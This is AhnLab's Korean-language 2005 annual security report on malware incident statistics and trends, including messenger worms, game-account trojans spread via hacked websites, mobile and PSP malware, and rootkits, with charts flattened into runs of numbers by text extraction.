ASEC Annaul Report 2005_0117

ASEC Report 2006. 1 안철수연구소의시큐리티대응센터 (AhnLab Security E-response Center) 는악성코드및보안위협으로부터고객을안전하게지키기위하여바이러스와보안전문가들로구성되어 24시간운영되는보안대응전문조직입니다. ASEC Annual Report는안철수연구소의 ASEC에서고객에게보다다양한정보를제공하기위하여 2005년한해동안의바이러스, 웜등악성코드와스파이웨어, 시큐리티에대한종합된정보와동향을요약하여리포트형태로제공하고있습니다. 629 526 464 476 462 301 286 305 365 371 329 284 125 261 216 233 278 304 230 236 225 175 212 285 3500 3000 2500 2000 1500 1000 500

목차 I. 2005년 AhnLab 악성코드동향 3 1. 악성코드피해동향 3 2. 신종 ( 변형 ) 악성코드발견동향 8 II. 2005년 AhnLab 스파이웨어동향 21 III. 2005년세계악성코드동향 25 1. 일본의악성코드동향 25 2. 중국의악성코드동향 29 3. 세계의악성코드동향 33 IV. 2005년시큐리티동향 34 V. AhnLab이바라본 2005년보안사고 38 1. 한국의보안사고 38 2. 세계의보안사고 40 3. 2006년보안사고전망 43 VI. 2005년 Key Issue I - 홈페이지변조를통한악성코드유포 44 VII. 2005년 Key Issue II - 스파이웨어피해증가와기법의고도화 50 VIII. AhnLab이예측하는 2006년 55 별첨 : 2005년 ASEC Monthly Report 목차 57

I. 2005 년 AhnLab 악성코드동향 작성자 : 허종오주임연구원 / 정진성주임연구원 1. 악성코드피해동향 허종오 (maha96@ahnlab.com) 주임연구원 2005년한해는 2004년에비해악성코드에대한고객피해문의건수가급격하게감소한한해였다. 이는악성코드신종 ( 변형 ) 의출현이감소하고악성아이알씨봇 (IRCBot) 에대한 V3의휴리스틱진단률이증가하여고객의피해건수가줄어든것이그원인으로보인다. 연도별악성코드피해문의를살펴보면, 지난 2002년부터악성코드에대한피해문의가증가하기시작하여 2004년에는최대신고건수 (100,539건) 를기록하였다. 이는다양한아이알씨봇및매스메일러변종의증가로인한것이주요원인이었으며, 2004 년 6월에최대신고를이룬후부터계속감소하여 2005년에는 2004년의 20% 수준으로감소하였다. [ 표1] 의수치를보면, 2005년총피해건수는 19,492 건으로전년대비약 80% 나급감한것을알수있다. 또한2005년월별접수된악성코드피해신고가 12월을제외하고는전년도에비해서급격히감소한것을알수있으며, 특히신고건수가가장많았던 2004년 5, 6월에비해 2005년동기간에는 90% 이상의감소를보였다. 1월 2월 3월 4월 5월 6월 7월 8월 9월 10월 11월 12월합계 2004 년 5,580 6,641 5,147 5,633 22,104 22,209 15,205 7,284 3,910 3,199 2,620 1,007 100,539 2005 년 2,232 1,979 1,651 1,572 2,066 1,906 1,497 1,564 1,212 1,240 1,343 1,230 19,492 [ 표 1] 2004, 2005 년국내악성코드피해신고통계수치 이를그래프로나타내면 [ 그림1] 과같으며, 2005년에는고객피해신고건수가큰기복없이꾸준히감소한것을알수있다. 25000 20000 15000 22104 22209 15205 2005년 2004년 10000 5000 5580 6641 2232 1979 7284 5147 5633 3910 3199 2620 1651 1572 2066 1906 1497 1564 1007 1212 1240 1343 1230 0 1 월 2 월 3 월 4 월 5 월 6 월 7 월 8 월 9 월 10 월 11 월 12 월 [ 그림 1] 2004, 2005 년월별피해신고건수비교

04 I. 2005 년 AhnLab 악성코드동향 악성코드피해 Top 20 2004년과 2005년피해를많이주었던악성코드는어떤것이있었는지 Top 20을뽑아보면 [ 표2], [ 표3] 과같다. 악성코드명 건수 악성코드명 건수 Win32/Netsky.worm.29568 28,344 Win32/Netsky.worm.29568 3,352 Win32/Dumaru.worm.9234 13,026 Win32/Maslan.C 868 Win32/Netsky.worm.17424 9,164 Win32/Sasser.worm.15872 502 Win32/Netsky.worm.28008 4,491 Win32/Netsky.worm.17920 388 Win32/Netsky.worm.17920 4,221 Win32/Sober.worm.55390 293 Win32/Netsky.worm.22016 4,106 Win32/Netsky.worm.25352 285 Win32/Netsky.worm.25352 3,187 Win-Trojan/LineageHack.37888.C 219 Win32/Bagle.worm.Z 2,316 Win32/Netsky.worm.22016 210 Win32/Sasser.worm.15872 1,879 Win32/Mytob.worm.59006 206 Win32/Blaster.worm.6176 1,652 Win32/Netsky.worm.16896.B 193 Win32/Netsky.worm.16896.B 1,132 Win32/Netsky.worm.17424 190 Win32/Netsky.worm.22016.C 686 Win32/Mytob.worm.61440 145 Win32/MyDoom.worm.32256 404 Win32/Netsky.worm.28008 142 Win32/Agobot.worm.104960 385 Win32/Netsky.worm.18944.B 128 Win32/Bagle.worm.Y 338 Win32/Bropia.worm.188928 123 Win32/Parite 256 Win32/Tenga.3666 115 Win32/Yaha.worm.45568.B 247 Win32/LovGate.worm.128000 110 Win32/LovGate.worm.128000 270 Win32/Bagle.worm.AS 101 Win32/AgoBot.worm.197120.C 228 Win32/Bagle.worm.Z 99 Win32/Welchia.worm.12800 172 Win32/Mytob.worm.41824 95 [ 표 2] 2004 년악성코드피해 Top 20 [ 표 3] 2005 년악성코드피해 Top 20 [ 표3] 을보면상위권을차지하고있는웜은 2004년과같이매스메일러임을알수있으며, 여전히넷스카이웜 (Win32/Netsky.worm) 변형들이차지하고있는것을볼수있다. [ 표3] 에서 2005년악성코드피해 Top 5를살펴보면, 1위를차지한넷스카이.29568 웜 (Win32/Netsky.worm.29568) 의비중이전체신고의 43% 에달해피해파급력이소수의악성코드에집중됐음을알수있다. 또한, 새서웜 (Win32/Sasser.worm. 15872) 과넷스카이.17920웜(Win32/Netsky.worm.17920) 은 2004년상반기에발견된악성코드들이나, 1년이지난지금까지해당악성코드가여전히상위권을차지한다는것은해당악성코드의강한전파력뿐아니라여전히보안제품을설치하지않았거나관리가소홀한시스템이많이존재한다는것을반증하는것이다. 2005년악성코드 Top 5에서특이한점은 2004년과달리네트워크취약점을이용하는마슬란.C(Win32/Maslan.C) 와새서웜 (Win32/Sasser.worm.15872) 이포함되었다는것으로, 이는이악성코드들이이용하는취약점 (MS03-026, MS04-011) 이존재하는시스템이아직까지많이존재한다는것을의미한다. 또한마슬란.C와같이안티바이러스제품이자신을진단, 치료하는것을어렵게하기위해은폐기법을사용하는악성코드가많이발생한점도주목할만하다.

05 I. 2005 년 AhnLab 악성코드동향 [ 표 3] 의 2005 년의악성코드 Top 20 자료를비율로나타내면 [ 그림 2] 와같다. Win32/LovGate.worm.128000 Win32/Bagle.worm.AS Win32/Tenga.3666 Win32/Bropia.worm.188928 Win32/Bagle.worm.Z Win32/Mytob.worm.41824 Win32/Netsky.worm.18944.B Win32/Netsky.worm.28008 1%1%1% Win32/Mytob.worm.61440 2% 2%1%1% Win32/Netsky.worm.17424 Win32/Netsky.worm.16896.B 2% 2%2% 2% Win32/Mytob.worm.59006 Win32/Netsky.worm.22016 Win-Trojan/LineageHack.37888.C 3% 3% 3% 4% Win32/Netsky.worm.29568 43% Win32/Netsky.worm.25352 4% Win32/Sober.worm.55390 5% Win32/Netsky.worm.17920 6% 11% Win32/Sasser.worm.15872 Win32/Maslan.C [ 그림 2] 2005 년악성코드피해문의건수 Top 20 Top 20에서주목할만한점은리니지핵.37888.C 트로이목마 (Win-Trojan/Lineage Hack.37888.C) 가처음으로 Top 20에진입하면서 7위를차지했다는것이다. 또한 MSN을이용해전파되는악성코드가여러종출현했는데이중브로피아웜 (Win32/ Bropia.worm.188928) 은 17위에올랐다. 2005년악성코드피해 Top 20를차지한대부분의악성코드들은메일을이용하는매스메일러로, 메일이 2004년과마찬가지로악성코드유포에인기있는방식으로사용되고있음을알수있다. 또한아이알씨봇과매스메일러의기능을통합한마이톱 (Win32/Mytob.worm) 이출현하여악성코드피해 Top 20에변형까지포함해 3종이오른것은악성코드간의구분이점차모호해지고있음을나타내고있다. 악성코드 Top 20 유형별현황 2004년, 2005년악성코드 Top 20를차지한악성코드들을유형별로분류해보면 [ 그림3], [ 그림4] 와같다. 윈도우파일 5% 웜 ( 취약점 ) 25% 트로이목마윈도우파일 5% 웜 (MSN) 5% 5% 웜 ( 취약점 ) 10% 웜 ( 메일 ) 70% 웜 ( 메일 ) 75% [ 그림 3] 2004 년악성코드 Top 20 의유형별현황 [ 그림 4] 2005 년악성코드 Top 20 의유형별현황

06 I. 2005 년 AhnLab 악성코드동향 2004년도피해유형을간략하게살펴보면, 피해문의대부분은웜에대한문의였으며, 단 5% 만이전통적인악성코드유형인윈도우파일바이러스였다. 웜에는메일에첨부되어유포되는매스메일러가대부분이었으며, 그외에는 2004년도의주요이슈였던취약점을이용한웜이나머지부분을차지했었다. 2005년에도웜이전체유형의 85% 를차지하였다. 웜중매스메일러는 2004년에비해소폭증가한데반해취약점을이용하는웜은감소한것을알수있다. 이는취약점을이용하는공격이줄었다기보다는공격자들이금전적인이득을취하기위해더다양하면서도손쉬운공격기법을사용한것이그원인으로보인다. 2005년악성코드 Top 20의유형에서특이할만한점은트로이목마의피해증가와새로운유형의발견이다. 트로이목마의 Top 20 진입이시사하는것은전파성이없는이전의트로이목마와달리, 사용자들이쉽게접근할수있는 웹사이트 라는사이버상의공공장소에트로이목마를숨겨놓음으로써, 트로이목마에전파력을부여하였다는점이다. 즉, 중국발웹해킹으로불려지는방식-웹서버의취약점을이용하여유명웹사이트를해킹한후웹페이지내에악성코드다운로드링크를삽입하여악성코드를유포하는방식-을사용하여트로이목마가광범위하고급속한전파력을보이게되었으며, 이로인해이전과달리많은사용자들에게피해를입힌것으로분석된다. 악성코드 Top 20의전파방법별현황 2004년과 2005년도의악성코드 Top 20가사용한전파방법을비교해보면 [ 그림5], [ 그림6] 과같다. 해당악성코드가하나이상의전파방법을가지고있다면가장많이사용되고피해가많았던것을대표전파방법으로하여산출하였다. 네트워크 (NETBIOS) 5% 네트워크 ( 취약점 ) 25% 메일 70% MSN 웹해킹 5% 5% 네트워크 ( 취약점 ) 15% 메일 75% [ 그림 5] 2004 년악성코드 Top 20 전파방법현황 [ 그림 6] 2005 년악성코드 Top 20 전파방법현황 2004년에는넷스카이웜의영향으로메일로전파되는매스메일러가대다수를차지하였으나, 아이알씨봇과같이네트워크취약점을이용하는방법도상당수를차지하였다. 2005년에도 2004년과같이많은악성코드들이매스메일러와네트워크취약점을이용하여전파되었다. 하지만, 전년과달리 2005년에는메일과네트워크취약점이외에도여러가지전파방법을사용하였으며, 이는악성코드제작자들이기존공격방식의

07 I. 2005 년 AhnLab 악성코드동향 효과성에대한의문점을가지고좀더적극적인공격방식을찾은것이원인이다. 악성코드 Top 20가사용하는전파방법에웹해킹방식과 MSN 메신저를이용하는전파방식이포함된것이주목할만하다. 특히 MSN을통한전파방식은감염된사용자의 MSN 메신저에등록된대화상대에게악성코드가숨겨져있는 URL을상대방에게보냄으로써, 상대방이의심없이해당 URL을클릭하여악성코드를쉽게전파하였다. 웹해킹방식은앞에설명한바와같이유명사이트의웹서버에존재하는 SQL 인젝션 (injection) 취약점을이용하여웹해킹을한후, 웹페이지에 iframe 태그를이용하여악성코드배포링크를심어놓는방식으로써, 트로이목마를손쉽게배포할수있는것이전파경로로많이사용된이유로보인다. 피해문의접수된악성코드의수 2004년, 2005년에피해문의가접수된신종악성코드의수를비교해보면 [ 그림7] 과같다. 2005년에는 2004년에비해 32% 감소한 5,590개의악성코드에대한피해가접수되었다. 이는 2005년들어전년도에경쟁적으로증가하였던매스메일러와악성아이알씨봇웜의출현이줄어든것이가장큰원인으로보인다. 또한 2005년에는 5,590개의악성코드가 19,492건의피해를입혀, 한악성코드당평균 3.5건의피해문의가접수된것으로나타났다. 이는평균 12건의피해문의가접수되었던 2004년에비해하나의악성코드가입히는피해가감소하였음을나타내는것으로, 2005년들어확산보다는실질적인이득을취하기위한목적으로악성코드가제작, 유포되기때문이다. 10000 8000 8207 6000 5590 4000 2000 0 2004 년 2005 년 [ 그림 7] 2004 년, 2005 년피해문의가접수된악성코드수 2005 년의악성코드피해동향을정리해보면다음과같다. - 여전히매스메일러와악성아이알씨봇에의한피해가많으나, 2004년에비해변형출현은감소 - 전통적인전파방식 ( 메일, 취약점 ) 외에웹해킹및 MSN 메신저등을이용한전파방식의보편화 - 악성코드유형별대표기능들이통합된신종출현 - 금전적인이득을노린악성코드증가 2005년도는 2004년과달리매스메일러와악성아이알씨봇웜변형출현은감소하였으나, 금전적이득을노린중국발웹해킹이국내에큰사회적인문제를일으킨한해였다. 2006년에는악성코드와의전쟁이아닌악성코드제작배포자와의전략싸움이될것으로보여진다.

08 I. 2005 년 AhnLab 악성코드동향 2. 신종 ( 변형 ) 악성코드발견동향 정진성 (jsjung@ahnlab.com) 주임연구원 2005년한해는새로운악성코드의제작기술로부터의도전과피해보다는전통적인악성코드유형들과해킹의결합으로광범위한피해를입었던사례가많았다. 또한이를통한악성코드제작의궁극적인목적은돈을벌기위한수단이라는점을확실히입증해주는한해였다. 이는악성코드뿐아니라온라인게임해킹툴그리고스파이웨어제작에서도쉽게목격되었다. 1 V3의새로운진단명기준에따라 2005년악성코드유형의기준은 2004년과비교했을때리눅스와애드웨어항목이삭제되었고, 유해가능항목이신설되었다. 2005 년악성코드의주요이슈는다음과같다. - 메신저웜의급격한증가 - 마이톱웜 (Win32/Mytob.worm) 의등장과피해증가 - 애드웨어를통해감염되는바이러스의등장 - 온라인게임의사용자계정을탈취하는악성코드변형증가 - MMS를이용하여전파되는휴대폰악성코드보고 - 다양한유형의트로이목마증가 - PnP 취약점 (MS05-039) 공격코드공개와악성코드확산 - 휴대용게임기악성코드의등장 - 은폐형악성코드의창궐 - WMF 취약점공개와관련샘플대량발견 이와같이 2005년은모바일악성코드, 64비트윈도우악성코드가첫출현했던 2004 년과달리향후에새로운보안위협으로다가올수있는새로운형태의악성코드출현은적었다. 그러나위에정리된내용처럼악성코드의제작과확산그리고피해가모두금전적인것과관련이깊었다는것을알수있다. 다음은 2004, 2005 년에연구소로접수된신종 ( 변형 ) 악성코드의접수통계이다.1 월 리눅스 파일 트로이 드롭퍼 스크립트 웜 매크로 애드웨어 월별합 1월 0 0 50 7 6 58 0 4 125 2월 0 1 130 8 1 146 0 0 286 3월 0 1 75 5 3 196 0 25 305 4월 0 1 111 0 7 403 0 4 526 5월 0 1 32 3 2 322 0 5 365 6월 0 0 59 2 1 402 0 0 464 7월 0 2 80 10 4 379 0 1 476 8월 0 0 87 9 8 358 0 0 462 9월 0 0 93 16 6 512 2 0 629 10월 2 0 82 13 0 274 0 0 371 11월 0 0 95 11 10 213 0 0 329 12월 0 0 120 4 6 154 0 0 284 유형별합 2 6 1014 88 54 3417 2 39 4622 [ 표 4] 2004 년신종 ( 변형 ) 악성코드유형별건수

09 I. 2005 년 AhnLab 악성코드동향 월 웜 트로이 드롭퍼 스크립트 파일 매크로 유해가능 월별합 1월 197 84 7 5 0 0 8 301 2월 204 43 2 0 1 0 11 261 3월 106 87 2 0 1 0 20 216 4월 116 98 8 5 0 1 5 233 5월 106 132 21 5 1 2 11 278 6월 81 142 41 16 3 0 21 304 7월 63 102 29 7 1 1 27 230 8월 70 123 29 2 1 1 10 236 9월 58 116 30 7 0 1 13 225 10월 39 101 25 2 0 0 8 175 11월 40 136 30 3 0 0 3 212 12월 53 189 34 1 1 0 7 285 유형별합 1133 1353 258 53 9 6 144 2956 [ 표 5] 2005 년신종 ( 변형 ) 악성코드유형별건수 다음은 1988 년부터집계된국내악성코드발견건수이다. 연도 88 89 90 91 92 93 94 95 96 합계 1 6 28 21 17 34 76 128 226 연도 97 98 99 00 01 02 03 04 05 합계 256 276 379 572 435 277 1239 4622 2956 [ 표 6] 1988 년 ~ 2005 년연도별국내발견신종 ( 변형 ) 악성코드통계 2004년과 2005년의전체악성코드수를놓고보면 2005년은전년대비약 64% 신종 ( 변형 ) 의악성코드가감소하였다. 감소의가장주된원인은 V3의악성아이알씨봇휴리스틱진단율이향상됨에따라서자연스레고객의악성아이알씨봇샘플신고수가줄었기때문이다. 하지만악성아이알씨봇은지금도가장많은변형이존재하며다양한채널을통해가장많은샘플이접수되고있다. 2005 년신종 ( 변형 ) 악성코드의특징 앞에서언급한 2005 년신종 ( 변형 ) 악성코드의특징을좀더자세히살펴보자. 메신저웜의급격한증가켈비르웜 (Win32/Kelvir.worm) 이라고명명된이웜은 MSN 메신저를이용하여전파되는특징을갖는다. 이웜이이슈가된가장큰이유는지금까지가장짧은시간내에많이발견된 MSN 메신저웜이기때문이다. 2005년 V3는무려 185개나되는켈비르웜변형을엔진에추가하였다. 이웜은 2005년상반기에집중적으로발견되었는데, 전파방식은메신저설치유무를확인한후메신저버디리스트를얻어와현재온라인상태의사용자에게자신을다운로드받을수있는 URL 링크를메시지로보낸다. 이는매우일반적인메신저웜의전파방식이다. 필자는메신저웜이 2005년급격히증가한원인중하나를 실시간 이란키워드로꼽는다. 이제는메일보다더많은의사교환도구로자리잡은메신저는개인적또는업무적으로반드시필요한프로그램으로사용되고있다. 또한모든것이실시간으

10 I. 2005 년 AhnLab 악성코드동향 로상대방의응답에사용자들이반응하므로악성코드의전파로쉽게이용될수있었던것으로본다. 이에 MSN 메신저는실행가능한특정파일의확장자를첨부하여보낼수없도록차단하였다. 이기능으로메신저웜은특정확장자의파일을첨부하여보낼수없게되어어느정도효과를보는듯했으나, 이어웜은자신또는다른악성코드가업로드된호스트의 URL을메시지로보내는방법으로변화하였다. 또한켈비르웜은다양한변형을양산해내기도했으며, 특이할만한점으로는자신의전파이외에다른악성코드의전파목적으로사용되기도했다는것이다. 켈비르웜의변형중하나는자신의리소스영역에실행압축된형태의악성아이알씨봇웜을숨겨두어실제로는악성아이알씨봇웜을전파하는데사용되기도하였다. 올하반기로들면서점차켈비르웜변형의발견보고는주춤해졌으며 10월말이후로새로운변형이보고되지않았다. 마이톱웜 (Win32/Mytob.worm) 등장과피해증가 2005년가장많은피해와변형이발견된악성코드중하나가마이톱웜변형이다. 이악성코드는메일로전파되는매스메일러이면서악성아이알씨봇웜기능도가지고있는복합적인악성코드이다. 즉, 악성아이알씨봇웜처럼특정한 IRC 서버에접속되어오퍼 (Offer) 의명령을받아악의적인기능을수행할수도있다. 이악성코드의소스는 IRC 서버의악성아아일씨봇관련채널에서배포되어수많은변형이보고되고있다. V3 엔진에는 2005년무려 365개가넘는변형이추가되었으며이는하루에하나꼴로변형이발견된셈이며, 2005년발견된이메일웜부분에서도 1등을차지한다. 마이톱웜의전파수단에사용된이메일은단지전파의수단일뿐그이상도이하도아니다. 즉, 2004년과달리 2005년은 IPS, IDS, 윈도우방화벽과같은인바운드패킷을차단하는제품들과윈도우보안패치자동화, 윈도우 XP SP2 사용자의증가로인해악성아이알씨봇웜의전파수단이제한되었다. 따라서악성아이알씨봇웜이켈비르웜처럼다양한전파수단을확보하기위하여메일을선택한것이라할수있겠다. 애드웨어를통해서감염되는바이러스의등장광고의유지또는자신의생존을위해애드웨어또는스파이웨어가감염능력을가진첫번째사례가부베바이러스 (Win32/Bube) 이다. 대부분의안티스파이웨어제품들이스파이웨어를진단하기위하여파일의특정한해쉬값을사용한다. 따라서바이러스와같이다른파일에감염된경우올바른값을구할수없기때문에, 안티스파이웨어제품이부베바이러스를진단하기위해서는안티바이러스엔진과같이감염된파일에서바이러스를진단하고치료할수있는기능이필요하다. 부베바이러스는이런안티스파이웨어의취약한부분을노린것으로보인다. 부베바이러스는일반적인바이러스처럼윈도우의실행파일을모두감염시키는형태는아니다. 이바이러스는 Explorer.exe만감염시킨다. 감염기법에있어서도특이한점은없으나 Explorer.exe 만감염시킨다는것이특이하다. 2005년발견, 보고된바이러스는모두 9건이다. 그중하나인보백스바이러스 (Win32/Bobax) 는부베바이러스와마찬가지로특정파일하나만감염시키는데이파일은특정 VGA 카드드라이버관련환경설정파일이다. 전세계적으로주로사용되는 VGA 카드는크게 2종류이다. 그러므로제작자는확실한타켓을설정할수있었고이파일은윈도우에의해서보호된파일도아니므로감염이후안티바이러스프로그램을이용하지않는한사용자들이발견하기어렵다. 즉, 이처럼 2005

11 I. 2005 년 AhnLab 악성코드동향 년바이러스의제작트렌드중하나가필요한파일만감염시킨후다른파일은감염시키지않고자신의생명력을최대한유지한다는것에있다. 또하나의트렌드는위와같이바이러스감염자체가자신을유지하는목적이거나또는다른악성코드를다운로드하는등제작자가의도한어떠한목적이있다는것이다. 이는과거바이러스감염트렌드에서는볼수없었다. 과거에는그저많은파일들을감염시키는것이그목적이었던것이다. 이러한추세는앞으로는계속되어 2006년에발견되는바이러스들중에서도이러한성격을갖는유형이나올가능성이높다. 온라인게임의사용자계정을탈취하는악성코드변형증가 2005년 4월일본의유명가격비교웹사이트가해킹되면서사이트에접속을하면악성코드가다운로드되는사건이발생했다. 이후사이트가잠정폐쇄되면서메인페이지는방문자들에대한사과와양해를구하며해당사이트에서발견된악성코드의정보와대응이가능한안티바이러스프로그램들의다운로드링크를함께자세히소개하였다. 본사건의악성코드는국내유명온라인게임의사용자계정-아이디와비밀번호- 를훔쳐내는트로이목마였다. 온라인게임의사용자계정을탈취하는트로이목마는이전부터있었지만이사건을계기로국내와일본을비롯한수많은웹사이트들이소위 중국發해킹 이라고불리우는해킹을당했다. 이해킹은취약한웹서버를선택하여해킹한후악성코드를업로드해둔다. 이때업로드된악성코드는해킹을한다수의웹서버가될수있다. 그리고메인페이지에 width=, height= 모두 0의값을가지는 iframe 태그를삽입하고인터넷익스플로러취약점을이용하여해당페이지를방문하면악성코드가자동으로다운로드되고실행되도록해둔다. 이과정은 [ 그림8] 과같이요약된다. 4. 감염된사용자들의온라인게임접속악성코드에의한키로깅시작 1. SQL Injection 공격및권한상승후페이지변조 2. 페이지변조사이트및악성코드를업로드한사이트 5. 악성코드가사용자계정을메일로전송 3. 사이트에방문한사용자시스템에악성코드감염 [ 그림 8] 중국發해킹의공격및감염방법 이런증상을가진트로이목마들은주로다음과같다.

12 I. 2005 년 AhnLab 악성코드동향 - 리니지핵트로이목마 (Win-Trojan/LineageHack) - 행핵트로이목마 (Win-Trojan/HangHack) - 코어게임핵트로이목마 (Win-Trojan/KorGameHack) 이트로이목마의동작방식은위와같이웹을통하여설치되면실행중인프로세스마다자신의 DLL을인젝션해둔다. 인젝션된 DLL은온라인게임의프로세스가실행되었는지유무를검사하여실행된경우키로깅을시작하고키로깅된내용을특정메일주소로보낸다. 이와같이온라인사용자계정을탈취하는악성코드가많아졌던가장큰원인은게임내의아이템들이현금거래가되기때문이다. 원래게임내의아이템은현금거래가되어서는안되지만암암리에이와같은거래가성행하고악성코드제작자들은사용자계정을탈취하여아이템을획득하는것이그목적이라하겠다. 국내온라인게임이세계로수출되고국내에도그사용자가해마다증가하고있다. 따라서이러한유형의트로이목마변형들과중국發해킹을통한감염방식은 2006 년에도계속될것으로전망된다. MMS 를이용하여전파되는모바일악성코드보고 MMS (Multimedia Messaging Service) 는이전의단문문자메시지 (SMS) 와달리메시지에멀티미디어관련파일등파일의첨부가가능한메시지이다. 국내의상황은아니지만모바일악성코드는지금까지유럽쪽에서주로발견되고있으며현재는최소20개국이상의나라에서발견되고있다. MMS를이용하여자신을전파하는첫번째모바일악성코드가컴워리어 (Commwarrior) 이다. 이악성코드전까지모바일악성코드는블루투스 (Bluetooth) 를이용하여자신을전파하였다. 블루투스가가진전파거리의한계가 MMS를통해모바일악성코드의거리적제약을넘어섰다고할수있다. 2005년모바일악성코드는그수가계속적으로증가하였다. 그리고휴대폰기기자체를공격하는형태의모바일악성코드출현이늘어, 메모리카드에암호를걸어두거나시스템을초기화하는등의피해를일으켰다. 이러한시스템피해는개인이해결하기어려운문제점을갖고있다. 또한윈도우악성코드를모바일악성코드가내부적으로가지고있어이를메모리카드에설치하는형태도보고되었다. 향후에도모바일악성코드는자신을전파시키는목적도가지면서휴대폰의고유기능을무력화시켜버리는즉, 기기자체를못쓰게하는증상을갖는악성코드가더증가할것으로예측된다. 다양한유형의트로이목마증가 중국發해킹의영향으로가장많은악성코드의증가수를보이는유형이바로트로이목마이다. [ 그림9] 는 2005년트로이목마접수율을나타낸것이다.

13 I. 2005 년 AhnLab 악성코드동향 200 발견건수 189 150 100 84 증가흐름 98 87 132 142 102 123 116 101 136 50 43 0 1 월 2 월 3 월 4 월 5 월 6 월 7 월 8 월 9 월 10 월 11 월 12 월 [ 그림 9] 2005 년월별신종 ( 변형 ) 트로이목마발견건수 [ 그림9] 에서보듯이 4/4 분기에는연중가장많은발견건수를보였다. 가장많이발견보고된트로이목마들은위에서도언급한온라인게임사용자계정을탈취하는트로이목마이외에다음과같이명명된것들이있다. - 그레이버드트로이목마 (Win-Trojan/GrayBird) - 후피곤트로이목마 (Win-Trojan/Hupigon) - 에이전트트로이목마 (Win-Trojan/Agent) - 다운로더트로이목마 (Win-Trojan/Downloader) 이러한트로이목마대부분은원격제어가가능하거나다른악성코드를설치또는 DOS 및스팸에이전트등의역할을하는형태가주류를이루었다. 특히그레이버드트로이목마, 후피곤트로이목마, 그리고피씨클라이언트트로이목마 (Win- Trojan/PcClient) 종류들은중국에서제작유포되는트로이목마들로그변형이상당수에달한다. 2005년한해중국發해킹으로인한다양한트로이목마들이출현하였고그여파는 2006년에도이어질것으로보인다. PnP 취약점 (MS05-039) 공격코드공개와악성코드확산조톱웜 (Win32/Zotob.worm) 이라고명명된이악성코드는플러그앤플레이 (Plug & Play) 취약점 (MS05-039) 을이용해원격에서코드를실행하여감염된다. 이취약점은 2005년도에보고된 MS의보안취약점중악성코드로제작되어피해를입힌것중두번째로큰위협이다. 하지만이취약점은크게다음의 2가지의문제로인하여과거의윈도우취약점만큼위협적이지는못했다. - 한글등일부언어권의윈도우에서는버퍼오버플로우공격이발생되지않는다. - 원격에서코드실행을할경우일부대상윈도우에유효한로그온자격을갖춰야한다 위와같은제약으로이취약점을이용한악성코드는영어권의윈도우 2000 운영체제라는한정된대상에서만전파되었다. 이후이취약점을이용한악성코드는계속적인변형이출현하였지만한정된대상으로이전의블래스터웜 (Win32/Blaster. worm) 과같은피해는일으키지못했다. 앞으로윈도우 XP SP2 혹은그상위버전

14 I. 2005 년 AhnLab 악성코드동향 에서는원격의코드실행을통한웜유형의악성코드가확산되거나피해를유발하지못할것으로예상된다. 2 흥미롭게도 *.PRX 파일은암호화된 *.ELF 포맷의실행파일이었다. 휴대용게임기의악성코드등장 2005년 10월우리는새로운악성코드출현소식을들었다. 이악성코드는휴대용게임기인소니 (SONY) 플레이스테이션포터블 (Playstation Portable, 이하 PSP) 과닌텐도 (Nintendo) 사의닌텐도 DS(Nintendo DS, 이하 NDS) 악성코드였다. 휴대용게임기에서는그동안악성코드를충분히제작할수있는환경과기회를제공하고있었는데그것은홈브루 (Homebrew) 라고일컬어지는개인이만든응용프로그램이해당게임기에서동작할수있었기때문이다. 또한게임기의펌웨어 (Firmware) 를다운그레이드하거나펌웨어데이터를수정할수있는툴등이대거등장하면서사용자들은게임기의내부와점점가까워졌다. PSP 트로이목마는최신버전의펌웨어를익스프로잇 (Expolit) 하여홈브루프로그램을동작할수있도록해준다고위장되어있었다. 명백한사실은 PC든 PSP든정상프로그램들만사용하면이러한악성코드의감염위험으로부터조금은안전해진다는사실이다. 발견된 PSP 트로이목마는 PSP 부팅에매우중요한역할을담당하는시스템의특정파일들을삭제한다. [ 그림 10] PSPBrick 트로이목마소스일부분 2 이파일이삭제되면부팅이불가능하고개인이이를해결할방법이없기때문에기술지원서비스를받아야만한다. 발견된휴대용게임기용악성코드는트로이목마형태이며모바일악성코드처럼웜과같은형태로발전하기에는아직이르다. 또한첫발견이후아직까지더이상의변형은발견되고있지않다. 이트로이목마는개념증명형태로제작된것으로보고되었지만해외에서는일부사용자들의감염피해가있었다고보고되었다. 일부사용자층은 PSP용안티바이러스를만들어야하는것이아닌가라는질문도해온다. 일부홈브루제작자나 PSP 사용자들사이에서는지금까지보고된트로이목마를검사할수있는프로그램을제작하여 PSP 포럼등에서공유하고있다. 이러한프로그램들은 PC상에서동작되며트로이목마설치파일의해쉬값을가지고있어이를진단데이터로사용하는형태이다. 은폐형악성코드의창궐 에서필자는 2005년한해는은폐형악성코드가대거등장할것이라고예측하였다. 이것은정확히맞아떨어졌다. 은폐기법사용으로유명했던전통적인악성코드들은다음과같다.

15 I. 2005 년 AhnLab 악성코드동향 - 핵데프트로이목마 (Win-Trojan/HackDef) - FU루트킷트로이목마 (Win-Trojan/FURootkit) - AFX루트킷트로이목마 (Win-Trojan/AFXRootkit) 이외에 2005년발견된악성코드에서는 2004년과달리은폐기법을하나의악성코드의기능으로사용한형태가증가하였다. 또한은폐기능을담당하는드라이버를별도로두는커널모드은폐형악성코드가증가하였다. 일반적인유저모드은폐형과커널모드은폐기법중후자가제작하기어렵고안티바이러스제품이진단하기도어렵다. 그럼에도이런류의악성코드가증가한원인은커널모드은폐기법의제작방법및소스가인터넷상에서많이공개되었기때문이다. [ 그림11] 은루트킷트로이목마 (Win-Trojan/Rootkit) 라고명명된악성코드, 주로커널모드루트킷이라고불리우는은폐형악성코드들의발견수치이다. 35 30 25 20 발견건수 33 15 10 5 0 3 1 월 0 2 월 7 3 월 9 3 3 3 1 4월 5월 6월 7월 8월 6 6 9월 10월 11월 8 12 월 [ 그림 11] 2005 년발견된월별신종 ( 변형 ) 은폐형악성코드수 10월에부쩍증가한원인을파악해본결과커널모드루트킷이대다수이며, 이들은주로악성아이알씨봇웜자신을숨기기위하여생성하는드라이버들로파악되었다. 악성아이알씨봇웜은이전에도은폐형이존재하였지만근래들어서는별도의드라이버를통하여자신을커널모드루트킷형태로숨긴다. 이외에도은폐기능을하나의증상으로갖는악성코드는상당수에달한다. 은폐형악성코드의목적은사용자나안티바이러스제품으로부터자신의진단을회피할목적으로제작된다. 일반적으로트로이목마형태가은폐기법을가장많이사용한다. 2005년대거발견된중국산트로이목마들상당수도은폐기법을사용하며일부트로이목마는분석을방해할목적으로트로이목마의코드를별도의코드모호화도구를이용하여조작해두기도하였다. 악성코드가사용하는은폐기법을파헤치고자외국유명보안전문가들이관련서적을출간하기도하였다. 